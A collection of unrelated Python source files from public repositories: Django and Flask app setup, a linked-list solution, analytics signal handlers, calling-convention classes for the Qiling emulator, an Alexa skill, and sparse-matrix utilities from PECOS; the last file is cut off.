venues/apps.py | danroberts728/hsvdotbeer | 18 | 17657 | <reponame>danroberts728/hsvdotbeer
from django.apps import AppConfig
class VenuesConfig(AppConfig):
name = "venues"
| 1.414063 | 1 |
problems/remove-duplicates-from-sorted-list.py | sailikhithk/tech-interview-prep | 0 | 17658 | """
The key is to use a set to remember if we seen the node or not.
Next, think about how we are going to *remove* the duplicate node?
The answer is to simply link the previous node to the next node.
So we need to keep a pointer `prev` on the previous node as we iterate the linked list.
So, the solution.
Create a set `seen`. #[1]
Point pointer `prev` on the first node. `cuur` on the second.
Now we iterate trough the linked list.
* For every node, we add its value to `seen`. Move `prev` and `curr` forward. #[2]
* If we seen the node, we *remove* the `curr` node. Then move the curr forward. #[3]
Return the `head`
"""
class Solution(object):
def deleteDuplicates(self, head):
if head is None or head.next is None: return head
prev = head
curr = head.next
seen = set() #[1]
seen.add(prev.val)
while curr:
if curr.val not in seen: #[2]
seen.add(curr.val)
curr = curr.next
prev = prev.next
else: #[3]
prev.next = curr.next #remove
curr = curr.next
return head
| 4.1875 | 4 |
corehq/apps/analytics/signals.py | kkrampa/commcare-hq | 1 | 17659 | <reponame>kkrampa/commcare-hq
from __future__ import absolute_import
from __future__ import unicode_literals
import six
from django.conf import settings
from django.contrib.auth.signals import user_logged_in
from corehq.apps.analytics.tasks import (
track_user_sign_in_on_hubspot,
HUBSPOT_COOKIE,
update_hubspot_properties,
identify,
update_subscription_properties_by_domain, get_subscription_properties_by_user)
from corehq.apps.analytics.utils import get_meta
from corehq.apps.registration.views import ProcessRegistrationView
from corehq.util.decorators import handle_uncaught_exceptions
from corehq.util.python_compatibility import soft_assert_type_text
from corehq.util.soft_assert import soft_assert
from django.dispatch import receiver
from django.urls import reverse
from corehq.apps.users.models import CouchUser
from corehq.apps.accounting.signals import subscription_upgrade_or_downgrade
from corehq.apps.domain.signals import commcare_domain_post_save
from corehq.apps.users.signals import couch_user_post_save
from corehq.apps.analytics.utils import get_instance_string
_no_cookie_soft_assert = soft_assert(to=['{}<EMAIL>('<EMAIL>', '<EMAIL>'),
<EMAIL>('<EMAIL>', '<EMAIL>'),
<EMAIL>('<EMAIL>', '<EMAIL>')],
send_to_ops=False)
@receiver(couch_user_post_save)
def user_save_callback(sender, **kwargs):
couch_user = kwargs.get("couch_user", None)
if couch_user and couch_user.is_web_user():
properties = {}
properties.update(get_subscription_properties_by_user(couch_user))
properties.update(get_domain_membership_properties(couch_user))
identify.delay(couch_user.username, properties)
update_hubspot_properties.delay(couch_user, properties)
@receiver(commcare_domain_post_save)
@receiver(subscription_upgrade_or_downgrade)
def domain_save_callback(sender, domain, **kwargs):
if isinstance(domain, six.string_types):
soft_assert_type_text(domain)
domain_name = domain
else:
domain_name = domain.name
update_subscription_properties_by_domain(domain_name)
def get_domain_membership_properties(couch_user):
env = get_instance_string()
return {
"{}number_of_project_spaces".format(env): len(couch_user.domains),
"{}project_spaces_list".format(env): '\n'.join(couch_user.domains),
}
@receiver(user_logged_in)
@handle_uncaught_exceptions(mail_admins=True)
def track_user_login(sender, request, user, **kwargs):
if settings.ANALYTICS_IDS.get('HUBSPOT_API_ID'):
couch_user = CouchUser.from_django_user(user)
if couch_user and couch_user.is_web_user():
if not request or HUBSPOT_COOKIE not in request.COOKIES:
# API calls, form submissions etc.
user_confirming = request.path.startswith(reverse(ProcessRegistrationView.urlname))
if user_confirming:
_no_cookie_soft_assert(False, 'User confirmed account but had no cookie')
else:
return
meta = get_meta(request)
track_user_sign_in_on_hubspot.delay(couch_user, request.COOKIES.get(HUBSPOT_COOKIE),
meta, request.path)
| 1.617188 | 2 |
manage.py | BeyondLam/Flask_Blog_Python3 | 2 | 17660 | from app import create_app, db
from flask_script import Manager
from flask_migrate import Migrate, MigrateCommand
app = create_app("develop")
manager = Manager(app)
Migrate(app, db)
manager.add_command("db", MigrateCommand)
# 初始化管理员账号数据,添加manager命令
@manager.command
def create_admin():
from app.models import Admin
from config_message.constant import ADMIN_USERNAME, ADMIN_PASSWORD, ADMIN_AVATAR_URL, ADMIN_POWER
try:
admin_new = Admin(username=ADMIN_USERNAME, password=<PASSWORD>, avatar=ADMIN_AVATAR_URL,
power=ADMIN_POWER)
db.session.add(admin_new)
db.session.commit()
print("初始化成功")
except:
print("初始化失败")
db.session.rollback()
if __name__ == '__main__':
manager.run() | 2.65625 | 3 |
qiling/qiling/cc/intel.py | mrTavas/owasp-fstm-auto | 2 | 17661 | <gh_stars>1-10
#!/usr/bin/env python3
#
# Cross Platform and Multi Architecture Advanced Binary Emulation Framework
from unicorn.x86_const import (
UC_X86_REG_AX, UC_X86_REG_EAX, UC_X86_REG_RAX, UC_X86_REG_RCX,
UC_X86_REG_RDI, UC_X86_REG_RDX, UC_X86_REG_RSI, UC_X86_REG_R8,
UC_X86_REG_R9, UC_X86_REG_R10
)
from qiling import Qiling
from . import QlCommonBaseCC
class QlIntelBaseCC(QlCommonBaseCC):
"""Calling convention base class for Intel-based systems.
Supports arguments passing over registers and stack.
"""
def __init__(self, ql: Qiling):
retreg = {
16: UC_X86_REG_AX,
32: UC_X86_REG_EAX,
64: UC_X86_REG_RAX
}[ql.archbit]
super().__init__(ql, retreg)
def unwind(self, nslots: int) -> int:
# no cleanup; just pop out the return address
return self.ql.arch.stack_pop()
class QlIntel64(QlIntelBaseCC):
"""Calling convention base class for Intel-based 64-bit systems.
"""
@staticmethod
def getNumSlots(argbits: int) -> int:
return max(argbits, 64) // 64
class QlIntel32(QlIntelBaseCC):
"""Calling convention base class for Intel-based 32-bit systems.
"""
@staticmethod
def getNumSlots(argbits: int) -> int:
return max(argbits, 32) // 32
def getRawParam(self, slot: int, nbits: int = None) -> int:
__super_getparam = super().getRawParam
if nbits == 64:
lo = __super_getparam(slot)
hi = __super_getparam(slot + 1)
val = (hi << 32) | lo
else:
val = __super_getparam(slot, nbits)
return val
class amd64(QlIntel64):
"""Default calling convention for POSIX (x86-64).
First 6 arguments are passed in regs, the rest are passed on the stack.
"""
_argregs = (UC_X86_REG_RDI, UC_X86_REG_RSI, UC_X86_REG_RDX, UC_X86_REG_R10, UC_X86_REG_R8, UC_X86_REG_R9) + (None, ) * 10
class ms64(QlIntel64):
"""Default calling convention for Windows and UEFI (x86-64).
First 4 arguments are passed in regs, the rest are passed on the stack.
Each stack frame starts with a shadow space in size of 4 items, corresponding
to the first arguments passed in regs.
"""
_argregs = (UC_X86_REG_RCX, UC_X86_REG_RDX, UC_X86_REG_R8, UC_X86_REG_R9) + (None, ) * 12
_shadow = 4
class macosx64(QlIntel64):
"""Default calling convention for Mac OS (x86-64).
First 6 arguments are passed in regs, the rest are passed on the stack.
"""
_argregs = (UC_X86_REG_RDI, UC_X86_REG_RSI, UC_X86_REG_RDX, UC_X86_REG_RCX, UC_X86_REG_R8, UC_X86_REG_R9) + (None, ) * 10
class cdecl(QlIntel32):
"""Calling convention used by all operating systems (x86).
All arguments are passed on the stack.
The caller is resopnsible to unwind the stack.
"""
_argregs = (None, ) * 16
class stdcall(QlIntel32):
"""Calling convention used by all operating systems (x86).
All arguments are passed on the stack.
The callee is resopnsible to unwind the stack.
"""
_argregs = (None, ) * 16
def unwind(self, nslots: int) -> int:
retaddr = super().unwind(nslots)
self.ql.reg.arch_sp += (nslots * self._asize)
return retaddr
| 2.390625 | 2 |
Alexa_Dynamo.py | gnomesoup/pyDynamo | 0 | 17662 | ### ----------- Python Code ------------###
import csv
from flask import Flask, render_template
from flask_ask import Ask, statement, question, session
import pandas as pd
### ------------- Start Alexa Stuff ---------###
app = Flask(__name__)
ask = Ask(app, "/")
#logging.getLogger("flask_ask").setLevel(logging.DEBUG)
### ----------- Switch Function --------------###
def setSwitch(Switchboard, switch, new_state):
switch_df = pd.read_csv(Switchboard + ".csv")
switch_df = switch_df.set_index('switch')
switch_df.set_value(switch,'state',new_state)
switch_df.to_csv(Switchboard + ".csv")
### ----------- Switch Function --------------###
def ReadInfo(Switchboard):
info_df = pd.read_csv(Switchboard + ".csv")
count = info_df.loc[0, 'Count']
return count
### ----------- Launch Skill --------------###
@ask.launch
def start_skill():
welcome_message = 'Hello, what would you like to ask the architect'
return question(welcome_message)
### -------------- Say Hello --------------- ####
@ask.intent("hello")
def hello():
setSwitch('C:\\sfdug\\Alexa','switch00', '1')
msg = "Hello San Francisco Dynamo user group"
return statement(msg)
### -------------- Create Points --------------- ####
@ask.intent("CreatePoints")
def CreatePoints():
setSwitch('C:\\sfdug\\Alexa','switch01', '1')
msg = "I am creating the points for the Janet Echelman sculptor"
return statement(msg)
### -------------- Create Connection --------------- ####
@ask.intent("CreateConnection")
def CreateConnection():
setSwitch('C:\\sfdug\\Alexa','switch02', '1')
msg = "I am creating a connection between the points"
return statement(msg)
### -------------- Create Framing --------------- ####
@ask.intent("CreateFraming")
def CreateFraming():
setSwitch('C:\\sfdug\\Alexa','switch03', '1')
msg = "I am creating the framing for the Janet Echelman sculptor"
return statement(msg)
### -------------- Reset --------------- ####
@ask.intent("Reset")
def Reset():
setSwitch('C:\\sfdug\\Alexa','switch01', '0')
setSwitch('C:\\sfdug\\Alexa','switch02', '0')
setSwitch('C:\\sfdug\\Alexa','switch03', '0')
msg = "I have reset Revvit"
return statement(msg)
### -------------- Count Framing --------------- ####
@ask.intent("CountFraming")
def CountFraming():
info = ReadInfo('C:\\sfdug\\AlexaRead')
msg = "I have counted: {}".format(info)
return statement(msg)
### --------------- Port for Ngrok -------------##
if __name__ == '__main__':
port = 9000 #the custom port you want
app.run(host='0.0.0.0', port=port)
app.run(debug=True) | 2.921875 | 3 |
HW/hklearn/model.py | leguiart/Machine-Learning | 0 | 17663 | import abc
'''
Interfaz sobre la cual todo modelo implementa.
Todo modelo dentro de la biblioteca hklearn implementa
los siguientes comportamientos:
-fit : Entrena el modelo con un a matriz de ejemplos X y sus respectivas etiquetas y
-predict : El modelo entrenado, predice con base en una entrada X
de ejemplos
'''
class ModelInterface(metaclass=abc.ABCMeta):
@classmethod
def __subclasshook__(cls, subclass):
return (hasattr(subclass, 'fit') and
callable(subclass.fit) and
hasattr(subclass, 'predict') and
callable(subclass.predict))
@ModelInterface.register
class Model:
"""Entrena modelo"""
def fit(self, X, y):
pass
"""Prediccion con base en el modelo entrenado"""
def predict(self, X):
pass | 3.34375 | 3 |
pecos/utils/smat_util.py | UniqueUpToPermutation/pecos | 2 | 17664 | # Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance
# with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
import collections
import numpy as np
import scipy.sparse as smat
def cs_matrix(arg1, mat_type, shape=None, dtype=None, copy=False, check_contents=False):
"""Custom compressed sparse matrix constructor that allows indices and indptr to be stored in different types.
Args:
arg1 (tuple): (data, indices, indptr) to construct compressed sparse matrix
mat_type (type): the matrix type to construct, one of [scipy.sparse.csr_matrix | scipy.sparse.csc_matrix]
shape (tuple, optional): shape of the matrix, default None to infer from arg1
dtype (type, optional): type of values in the matrix, default None to infer from data
copy (bool, optional): whether to copy the input arrays, defaults to False
check_contents (bool, optional): whether to check array contents to determine dtype, defaults to False
Returns:
compressed sparse matrix in mat_type
"""
(data, indices, indptr) = arg1
indices_dtype = smat.sputils.get_index_dtype(indices, check_contents=check_contents)
indptr_dtype = smat.sputils.get_index_dtype(indptr, check_contents=check_contents)
ret = mat_type(shape, dtype=dtype)
# Read matrix dimensions given, if any
if shape is None:
# shape not already set, try to infer dimensions
try:
major_dim = len(ret.indptr) - 1
minor_dim = ret.indices.max() + 1
except Exception:
raise ValueError("unable to infer matrix dimensions")
else:
shape = ret._swap((major_dim, minor_dim))
ret.indices = np.array(indices, copy=copy, dtype=indices_dtype)
ret.indptr = np.array(indptr, copy=copy, dtype=indptr_dtype)
ret.data = np.array(data, copy=copy, dtype=dtype)
return ret
def csr_matrix(arg1, shape=None, dtype=None, copy=False):
"""Custom csr_matrix constructor that allows indices and indptr to be stored in different types.
Args:
arg1 (tuple): (data, indices, indptr) to construct csr_matrix
shape (tuple, optional): shape of the matrix, default None to infer from arg1
dtype (type, optional): type of values in the matrix, default None to infer from data
copy (bool, optional): whether to copy the input arrays, defaults to False
Returns:
csr_matrix
"""
return cs_matrix(arg1, smat.csr_matrix, shape=shape, dtype=dtype, copy=copy)
def csc_matrix(arg1, shape=None, dtype=None, copy=False):
"""Custom csc_matrix constructor that allows indices and indptr to be stored in different types.
Args:
arg1 (tuple): (data, indices, indptr) to construct csc_matrix
shape (tuple, optional): shape of the matrix, default None to infer from arg1
dtype (type, optional): type of values in the matrix, default None to infer from data
copy (bool, optional): whether to copy the input arrays, defaults to False
Returns:
csc_matrix
"""
return cs_matrix(arg1, smat.csc_matrix, shape=shape, dtype=dtype, copy=copy)
def save_matrix(tgt, mat):
"""Save dense or sparse matrix to file.
Args:
tgt (str): path to save the matrix
mat (numpy.ndarray or scipy.sparse.spmatrix): target matrix to save
"""
assert isinstance(tgt, str), "tgt for save_matrix must be a str, but got {}".format(type(tgt))
with open(tgt, "wb") as tgt_file:
if isinstance(mat, np.ndarray):
np.save(tgt_file, mat, allow_pickle=False)
elif isinstance(mat, smat.spmatrix):
smat.save_npz(tgt_file, mat, compressed=False)
else:
raise NotImplementedError("Save not implemented for matrix type {}".format(type(mat)))
def load_matrix(src, dtype=None):
"""Load dense or sparse matrix from file.
Args:
src (str): path to load the matrix.
dtype (numpy.dtype, optional): if given, convert matrix dtype. otherwise use default type.
Returns:
mat (numpy.ndarray or scipy.sparse.spmatrix): loaded matrix
Notes:
If underlying matrix is {"csc", "csr", "bsr"}, indices will be sorted.
"""
if not isinstance(src, str):
raise ValueError("src for load_matrix must be a str")
mat = np.load(src)
# decide whether it's dense or sparse
if isinstance(mat, np.ndarray):
pass
elif isinstance(mat, np.lib.npyio.NpzFile):
# Ref code: https://github.com/scipy/scipy/blob/v1.4.1/scipy/sparse/_matrix_io.py#L19-L80
matrix_format = mat["format"].item()
if not isinstance(matrix_format, str):
# files saved with SciPy < 1.0.0 may contain unicode or bytes.
matrix_format = matrix_format.decode("ascii")
try:
cls = getattr(smat, "{}_matrix".format(matrix_format))
except AttributeError:
raise ValueError("Unknown matrix format {}".format(matrix_format))
if matrix_format in ("csc", "csr", "bsr"):
mat = cls((mat["data"], mat["indices"], mat["indptr"]), shape=mat["shape"])
# This is in-place operation
mat.sort_indices()
elif matrix_format == "dia":
mat = cls((mat["data"], mat["offsets"]), shape=mat["shape"])
elif matrix_format == "coo":
mat = cls((mat["data"], (mat["row"], mat["col"])), shape=mat["shape"])
else:
raise NotImplementedError(
"Load is not implemented for sparse matrix of format {}.".format(matrix_format)
)
else:
raise TypeError("load_feature_matrix encountered unknown input format {}".format(type(mat)))
if dtype is None:
return mat
else:
return mat.astype(dtype)
def transpose(mat):
"""Transpose a dense/sparse matrix.
Args:
X (np.ndarray, spmatrix): input matrix to be transposed.
Returns:
transposed X
"""
if not isinstance(mat, smat.spmatrix):
raise ValueError("mat must be a smat.spmatrix type")
if isinstance(mat, smat.csr_matrix):
return csc_matrix((mat.data, mat.indices, mat.indptr), shape=(mat.shape[1], mat.shape[0]))
elif isinstance(mat, smat.csc_matrix):
return csr_matrix((mat.data, mat.indices, mat.indptr), shape=(mat.shape[1], mat.shape[0]))
else:
return mat.T
def sorted_csr_from_coo(shape, row_idx, col_idx, val, only_topk=None):
"""Return a row-sorted CSR matrix from a COO sparse matrix.
Nonzero elements in each row of the returned CSR matrix is sorted in an descending order based on the value. If only_topk is given, only topk largest elements will be kept.
Args:
shape (tuple): the shape of the input COO matrix
row_idx (ndarray): row indices of the input COO matrix
col_idx (ndarray): col indices of the input COO matrix
val (ndarray): values of the input COO matrix
only_topk (int, optional): keep only topk elements per row. Default None to ignore
Returns:
csr_matrix
"""
csr = smat.csr_matrix((val, (row_idx, col_idx)), shape=shape)
csr.sort_indices()
for i in range(shape[0]):
rng = slice(csr.indptr[i], csr.indptr[i + 1])
sorted_idx = np.argsort(-csr.data[rng], kind="mergesort")
csr.indices[rng] = csr.indices[rng][sorted_idx]
csr.data[rng] = csr.data[rng][sorted_idx]
if only_topk is not None:
assert isinstance(only_topk, int), f"Wrong type: type(only_topk) = {type(only_topk)}"
only_topk = max(min(1, only_topk), only_topk)
nnz_of_insts = csr.indptr[1:] - csr.indptr[:-1]
row_idx = np.repeat(np.arange(shape[0], dtype=csr.indices.dtype), nnz_of_insts)
selected_idx = (np.arange(len(csr.data)) - csr.indptr[row_idx]) < only_topk
row_idx = row_idx[selected_idx]
col_idx = csr.indices[selected_idx]
val = csr.data[selected_idx]
indptr = np.cumsum(np.bincount(row_idx + 1, minlength=(shape[0] + 1)))
csr = csr_matrix((val, col_idx, indptr), shape=shape, dtype=val.dtype)
return csr
def sorted_csc_from_coo(shape, row_idx, col_idx, val, only_topk=None):
"""Return a column-sorted CSC matrix from a COO sparse matrix.
Nonzero elements in each col of the returned CSC matrix is sorted in an descending order based on the value. If only_topk is given, only topk largest elements will be kept.
Args:
shape (tuple): the shape of the input COO matrix
row_idx (ndarray): row indices of the input COO matrix
col_idx (ndarray): col indices of the input COO matrix
val (ndarray): values of the input COO matrix
only_topk (int, optional): keep only topk elements per col. Default None to ignore
Returns:
csc_matrix
"""
csr = sorted_csr_from_coo(shape[::-1], col_idx, row_idx, val, only_topk=None)
return transpose(csr)
def binarized(X, inplace=False):
"""Binarize a dense/sparse matrix. All nonzero elements become 1.
Args:
X (np.ndarray, spmatrix): input matrix to binarize
inplace (bool, optional): if True do the binarization in-place, else return a copy. Default False
Returns:
binarized X
"""
if not isinstance(X, (np.ndarray, smat.spmatrix)):
raise NotImplementedError(
"this function only support X being np.ndarray or scipy.sparse.spmatrix."
)
if not inplace:
X = X.copy()
if isinstance(X, smat.spmatrix):
X.data[:] = 1
else:
X[:] = 1
return X
def sorted_csr(csr, only_topk=None):
"""Return a copy of input CSR matrix where nonzero elements in each row is sorted in an descending order based on the value.
If `only_topk` is given, only top-k largest elements will be kept.
Args:
csr (csr_matrix): input csr_matrix to sort
only_topk (int, optional): keep only topk elements per row. Default None to ignore
Returns:
csr_matrix
"""
if not isinstance(csr, smat.csr_matrix):
raise ValueError("the input matrix must be a csr_matrix.")
row_idx = np.repeat(np.arange(csr.shape[0], dtype=np.uint32), csr.indptr[1:] - csr.indptr[:-1])
return sorted_csr_from_coo(csr.shape, row_idx, csr.indices, csr.data, only_topk)
def sorted_csc(csc, only_topk=None):
"""Return a copy of input CSC matrix where nonzero elements in each column is sorted in an descending order based on the value.
If `only_topk` is given, only top-k largest elements will be kept.
Args:
csc (csc_matrix): input csc_matrix to sort
only_topk (int, optional): keep only topk elements per col. Default None to ignore
Returns:
csc_matrix
"""
if not isinstance(csc, smat.csc_matrix):
raise ValueError("the input matrix must be a csc_matrix.")
return transpose(sorted_csr(transpose(csc)))
def dense_to_csr(dense, topk=None, batch=None):
"""Memory efficient method to construct a csr_matrix from a dense matrix.
Args:
dense (ndarray): 2-D dense matrix to convert.
topk (int or None, optional): keep topk non-zeros with largest abs value for each row.
Default None to keep everything.
batch (int or None, optional): the batch size for construction.
Default None to use min(dense.shape[0], 10 ** 5).
Returns:
csr_matrix that has topk nnz each row with the same shape as dense.
"""
BATCH_LIMIT = 10 ** 5
if topk is None:
keep_topk = dense.shape[1]
else:
keep_topk = min(dense.shape[1], max(1, int(topk)))
# if batch is given, use input batch size even if input batch > BATCH_LIMIT
if batch is None:
chunk_size = min(dense.shape[0], BATCH_LIMIT)
else:
chunk_size = min(dense.shape[0], max(1, int(batch)))
max_nnz = keep_topk * dense.shape[0]
indptr_dtype = np.int32 if max_nnz < np.iinfo(np.int32).max else np.int64
indices_dtype = np.int32 if dense.shape[1] < np.iinfo(np.int32).max else np.int64
data = np.empty((keep_topk * dense.shape[0],), dtype=dense.dtype)
indices = np.empty((keep_topk * dense.shape[0],), dtype=indices_dtype)
for i in range(0, dense.shape[0], chunk_size):
cur_chunk = dense[i : i + chunk_size, :]
chunk_len = cur_chunk.shape[0]
if keep_topk < dense.shape[1]:
col_indices = np.argpartition(abs(cur_chunk), keep_topk, axis=1)[:, -keep_topk:]
else:
col_indices = np.repeat(np.arange(keep_topk)[np.newaxis, :], chunk_len, axis=0)
row_indices = np.repeat(np.arange(chunk_len)[:, np.newaxis], keep_topk, axis=1)
chunk_data = cur_chunk[row_indices, col_indices]
data[i * keep_topk : i * keep_topk + chunk_data.size] = chunk_data.flatten()
indices[i * keep_topk : i * keep_topk + col_indices.size] = col_indices.flatten()
indptr = np.arange(0, dense.shape[0] * keep_topk + 1, keep_topk, dtype=indptr_dtype)
# Bypass scipy constructor to allow different indices and indptr types
return csr_matrix((data, indices, indptr), shape=dense.shape)
def vstack_csr(matrices, dtype=None):
"""Memory efficient method to stack csr_matrices vertically.
The returned matrix will retain the indices order.
Args:
matrices (list or tuple of csr_matrix): the matrices to stack in order, with shape (M1 x N), (M2 x N), ...
dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices
Returns:
csr_matrix with shape (M1 + M2 + ..., N)
"""
if not isinstance(matrices, (list, tuple)):
raise ValueError("matrices should be either list or tuple")
if any(not isinstance(X, smat.csr_matrix) for X in matrices):
raise ValueError("all matrix in matrices need to be csr_matrix!")
if len(matrices) <= 1:
return matrices[0] if len(matrices) == 1 else None
nr_cols = matrices[0].shape[1]
if any(mat.shape[1] != nr_cols for mat in matrices):
raise ValueError("Second dim not match")
total_nnz = sum([int(mat.nnz) for mat in matrices])
total_rows = sum([int(mat.shape[0]) for mat in matrices])
# infer result dtypes from inputs
int32max = np.iinfo(np.int32).max
if dtype is None:
dtype = smat.sputils.upcast(*[mat.dtype for mat in matrices])
indices_dtype = np.int64 if nr_cols > int32max else np.int32
indptr_dtype = np.int64 if total_nnz > int32max else np.int32
indptr = np.empty(total_rows + 1, dtype=indptr_dtype)
indices = np.empty(total_nnz, dtype=indices_dtype)
data = np.empty(total_nnz, dtype=dtype)
indptr[0], cur_nnz, cur_row = 0, 0, 0
for mat in matrices:
indices[cur_nnz : cur_nnz + mat.nnz] = mat.indices
data[cur_nnz : cur_nnz + mat.nnz] = mat.data
# can not merge the following two lines because
# mat.indptr[1:] + cur_nnz may overflow!
indptr[cur_row + 1 : cur_row + mat.shape[0] + 1] = mat.indptr[1:]
indptr[cur_row + 1 : cur_row + mat.shape[0] + 1] += cur_nnz
cur_nnz += mat.nnz
cur_row += mat.shape[0]
return csr_matrix((data, indices, indptr), shape=(total_rows, nr_cols))
def hstack_csr(matrices, dtype=None):
"""Memory efficient method to stack csr_matrices horizontally.
The returned matrix will retain the indices order.
Args:
matrices (list or tuple of csr_matrix): the matrices to stack in order, with shape (M x N1), (M x N2), ...
dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices
Returns:
csr_matrix with shape (M, N1 + N2 + ...)
"""
if not isinstance(matrices, (list, tuple)):
raise ValueError("matrices should be either list or tuple")
if any(not isinstance(X, smat.csr_matrix) for X in matrices):
raise ValueError("all matrix in matrices need to be csr_matrix!")
if len(matrices) <= 1:
return matrices[0] if len(matrices) == 1 else None
nr_rows = matrices[0].shape[0]
if any(mat.shape[0] != nr_rows for mat in matrices):
raise ValueError("First dim not match")
total_nnz = sum([int(mat.nnz) for mat in matrices])
total_cols = sum([int(mat.shape[1]) for mat in matrices])
# infer result dtypes from inputs
int32max = np.iinfo(np.int32).max
if dtype is None:
dtype = smat.sputils.upcast(*[mat.dtype for mat in matrices])
indices_dtype = np.int64 if nr_rows > int32max else np.int32
indptr_dtype = np.int64 if total_nnz > int32max else np.int32
indptr = np.empty(nr_rows + 1, dtype=indptr_dtype)
indices = np.empty(total_nnz, dtype=indices_dtype)
data = np.empty(total_nnz, dtype=dtype)
indptr[0], cur_ptr = 0, 0
for i in range(nr_rows): # for every row
start_col = 0
for mat in matrices:
cur_nnz = mat.indptr[i + 1] - mat.indptr[i]
indices[cur_ptr : cur_ptr + cur_nnz] = (
mat.indices[mat.indptr[i] : mat.indptr[i + 1]] + start_col
)
data[cur_ptr : cur_ptr + cur_nnz] = mat.data[mat.indptr[i] : mat.indptr[i + 1]]
cur_ptr += cur_nnz
start_col += mat.shape[1]
indptr[i + 1] = cur_ptr
return csr_matrix((data, indices, indptr), shape=(nr_rows, total_cols))
def block_diag_csr(matrices, dtype=None):
"""Memory efficient method to stack csr_matrices block diagonally.
The returned matrix will retain the indices order.
Args:
matrices (list or tuple of csr_matrix): the matrices to stack in order, with shape (NR1 x NC1), (NR2 x NC2), ...
dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices
Returns:
csr_matrix with shape (NR1 + NR2 + ..., NC1 + NC2 + ...)
"""
if not isinstance(matrices, (list, tuple)):
raise ValueError("matrices should be either list or tuple")
if any(not isinstance(X, smat.csr_matrix) for X in matrices):
raise ValueError("all matrix in matrices need to be csr_matrix!")
if len(matrices) <= 1:
return matrices[0] if len(matrices) == 1 else None
total_nnz = sum([int(mat.nnz) for mat in matrices])
total_rows = sum([int(mat.shape[0]) for mat in matrices])
total_cols = sum([int(mat.shape[1]) for mat in matrices])
# infer result dtypes from inputs
int32max = np.iinfo(np.int32).max
if dtype is None:
dtype = smat.sputils.upcast(*[mat.dtype for mat in matrices])
indices_dtype = np.int64 if total_rows > int32max else np.int32
indptr_dtype = np.int64 if total_nnz > int32max else np.int32
indptr = np.empty(total_rows + 1, dtype=indptr_dtype)
indices = np.empty(total_nnz, dtype=indices_dtype)
data = np.empty(total_nnz, dtype=dtype)
cur_row, cur_col, cur_nnz = 0, 0, 0
indptr[0] = 0
for mat in matrices:
data[cur_nnz : cur_nnz + mat.nnz] = mat.data
indices[cur_nnz : cur_nnz + mat.nnz] = mat.indices + cur_col
indptr[1 + cur_row : 1 + cur_row + mat.shape[0]] = mat.indptr[1:] + indptr[cur_row]
cur_col += mat.shape[1]
cur_row += mat.shape[0]
cur_nnz += mat.nnz
return csr_matrix((data, indices, indptr), shape=(total_rows, total_cols))
def vstack_csc(matrices, dtype=None):
"""Memory efficient method to stack csc_matrices vertically.
The returned matrix will retain the indices order.
Args:
matrices (list or tuple of csc_matrix): the matrices to stack in order, with shape (M1 x N), (M2 x N), ...
dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices
Returns:
csc_matrix with shape (M1 + M2 + ..., N)
"""
if not isinstance(matrices, (list, tuple)):
raise ValueError("matrices should be either list or tuple")
if any(not isinstance(X, smat.csc_matrix) for X in matrices):
raise ValueError("all matrix in matrices need to be csc_matrix!")
if len(matrices) <= 1:
return matrices[0] if len(matrices) == 1 else None
return transpose(hstack_csr([transpose(mat) for mat in matrices], dtype=dtype))
def hstack_csc(matrices, dtype=None):
"""Memory efficient method to stack csc_matrices horizontally.
The returned matrix will retain the indices order.
Args:
matrices (list or tuple of csc_matrix): the matrices to stack in order, with shape (M x N1), (M x N2), ...
dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices
Returns:
csc_matrix with shape (M, N1 + N2 + ...)
"""
if not isinstance(matrices, (list, tuple)):
raise ValueError("matrices should be either list or tuple")
if any(not isinstance(X, smat.csc_matrix) for X in matrices):
raise ValueError("all matrix in matrices need to be csc_matrix!")
if len(matrices) <= 1:
return matrices[0] if len(matrices) == 1 else None
return transpose(vstack_csr([transpose(mat) for mat in matrices], dtype=dtype))
def block_diag_csc(matrices, dtype=None):
"""Memory efficient method to stack csc_matrices block diagonally.
The returned matrix will retain the indices order.
Args:
matrices (list or tuple of csr_matrix): the matrices to stack in order, with shape (NR1 x NC1), (NR2 x NC2), ...
dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices
Returns:
csc_matrix with shape (NR1+ NR2 + ..., NC1 + NC2 + ...)
"""
if not isinstance(matrices, (list, tuple)):
raise ValueError("matrices should be either list or tuple")
if any(not isinstance(X, smat.csc_matrix) for X in matrices):
raise ValueError("all matrix in matrices need to be csc_matrix!")
if len(matrices) <= 1:
return matrices[0] if len(matrices) == 1 else None
return transpose(block_diag_csr([transpose(mat) for mat in matrices], dtype=dtype))
def get_csc_col_nonzero(matrix):
"""Given a matrix, returns the nonzero row ids of each col
The returned ndarray will retain the indices order.
Args:
matrix: the matrix to operate on, with shape (N x M)
Returns:
list of ndarray [a_1, a_2, a_3, ...], where a_i is an array indicate the nonzero row ids of col i
"""
if not isinstance(matrix, smat.csc_matrix):
raise ValueError("matrix need to be csc_matrix!")
return [matrix.indices[matrix.indptr[i] : matrix.indptr[i + 1]] for i in range(matrix.shape[1])]
def get_csr_row_nonzero(matrix):
"""Given a matrix, returns the nonzero col ids of each row
The returned ndarray will retain the indices order.
Args:
matrix: the matrix to operate on, with shape (N x M)
Returns:
list of ndarray [a_1, a_2, a_3, ...], where a_i is an array indicate the nonzero col ids of row i
"""
if not isinstance(matrix, smat.csr_matrix):
raise ValueError("matrix need to be csr_matrix!")
return [matrix.indices[matrix.indptr[i] : matrix.indptr[i + 1]] for i in range(matrix.shape[0])]
def get_row_submatrices(matrices, row_indices):
"""Get the sub-matrices of given matrices by selecting the rows given in row_indices
Args:
matrices (list of csr_matrix or ndarray): the matrices [mat_1, mat_2, ...] to operate on, with shape (M x N1), (M x N2), ...
row_indices (list or ndarray): the row indices to select
Returns:
list of csr_matrix or ndarray
"""
if not isinstance(matrices, (list, tuple)):
raise ValueError("matrices should be either list or tuple")
n_mat = len(matrices)
if n_mat == 0:
raise ValueError("At least one matrix required as input")
if any(not isinstance(X, (smat.csr_matrix, np.ndarray)) for X in matrices):
raise ValueError("all matrix in matrices need to be csr_matrix or ndarray!")
